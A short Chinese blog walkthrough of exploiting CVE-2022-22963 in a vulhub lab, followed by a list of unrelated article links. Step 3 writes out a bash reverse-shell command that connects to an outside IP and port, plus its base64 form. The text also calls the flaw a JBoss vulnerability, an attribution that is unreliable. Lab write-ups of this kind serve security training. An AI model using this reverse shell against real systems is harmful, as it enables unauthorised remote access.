当前位置: 首页 > news >正文

vulhub远程执行命令漏洞CVE-2022-22963

1.开启环境

2.访问目标网址,是关于JBoss中间件的漏洞

3.构造反弹shell的payload

将其进行base64编码

bash -i >& /dev/tcp/47.121.191.208/8898 0>&1
YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4xMjEuMTkxLjIwOC84ODk4IDA+JjE=

4.通过抓包,将payload带进数据包中,放行

5.云服务器进行监听8898端口

6.放行后弹到shell,执行ls测试一下


http://www.mrgr.cn/news/22151.html

相关文章:

  • SprinBoot+Vue校园数字化图书馆系统的设计与实现
  • Vulhub Apache Airflow (CVE-2020-11978)
  • QML入门之创建可重用的组件(一)
  • 828华为云征文|Flexus X实例C#/.Net Core 结合(git代码管理、docker自定义镜像)快速发布部署-让你的项目飞起来~
  • 【微前端记录】微前端qiankun初体验
  • 面试字节视觉大模型算法岗,太难了。。。
  • Linux在桌面上创建软件启动快捷方式
  • systemverilog如何用一行code输出两个队列在可变范围内的对比结果
  • 【大数据算法】一文掌握大数据算法之:空间亚线性算法。
  • vulhub GhostScript 沙箱绕过(CVE-2018-16509)
  • GNU风格代码编译(27)
  • react js 笔记 3
  • 【系统架构设计师】抽象工厂设计模式
  • 【c++进阶[五]】list相关接口介绍及list和vector的对比
  • ISAC: Toward Dual-Functional Wireless Networks for 6G and Beyond【论文阅读笔记】
  • golang fmt.Printf中 %q
  • 创建表时添加约束
  • Mac在Python项目中通过opencv模版匹配定位不到图片
  • Oracle rman 没有0级时1级备份和0级大小一样,可以用来做恢复 resetlogs后也可以
  • MySQL record 03 part